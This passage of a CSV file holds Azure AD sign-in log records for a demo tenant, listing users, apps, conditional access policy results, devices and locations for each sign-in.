'83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",69bf3c7f-96b8-4aae-959c-a7bbd5981400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,69bf3c7f-96b8-4aae-959c-a7bbd5981400,SigninLogs,Sucess,41.90428925,-85.99833679
+927,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:27.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,45752ec6-d8ad-4baa-8c09-74f14e78994c,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",429b44fe-fb38-41be-832c-f14284ae1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,429b44fe-fb38-41be-832c-f14284ae1200,SigninLogs,Sucess,41.90428925,-85.99833679
+928,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:53.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,32d11921-4d05-4be3-90ab-e8acb2e72667,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",85789f99-3a4c-45a5-91bc-019497b91300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,85789f99-3a4c-45a5-91bc-019497b91300,SigninLogs,Sucess,50.6406517,5.572050095
+929,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:57.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5024867d-03af-416b-b2d7-5dfea9189e7e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ca1de4aa-1783-40c1-890d-66bc20dc1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ca1de4aa-1783-40c1-890d-66bc20dc1300,SigninLogs,Sucess,36.6404686,-78.26995087
+930,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:56.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,64c5469f-d03e-0000-cd0c-8eb93846a599,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,,[],notApplied,08/04/2020 14:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",8680cefc-a188-4b38-a6de-913494154200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8680cefc-a188-4b38-a6de-913494154200,SigninLogs,Failed,38.47222137,-77.41989899
+931,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:20.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7b0e3f8a-54d9-4d5b-a2ca-4dbe9d3b6ed0,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",7177d659-5709-4c9c-976e-940f1e101300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,7177d659-5709-4c9c-976e-940f1e101300,SigninLogs,Sucess,41.90428925,-85.99833679
+932,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:12.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1fe08297-53fe-4fa1-b27c-8f1dbf739576,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",88812ca6-4188-4e59-83ab-d71dcf991300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,88812ca6-4188-4e59-83ab-d71dcf991300,SigninLogs,Sucess,41.90428925,-85.99833679
+933,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:12.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1fe08297-53fe-4fa1-b27c-8f1dbf739576,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",88812ca6-4188-4e59-83ab-d71dcf991300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,88812ca6-4188-4e59-83ab-d71dcf991300,SigninLogs,Sucess,41.90428925,-85.99833679
+934,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:27.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,af8c4700-1a8b-4055-b4a5-e81248428507,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",88812ca6-4188-4e59-83ab-d71d1e9c1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,88812ca6-4188-4e59-83ab-d71d1e9c1300,SigninLogs,Sucess,41.90428925,-85.99833679
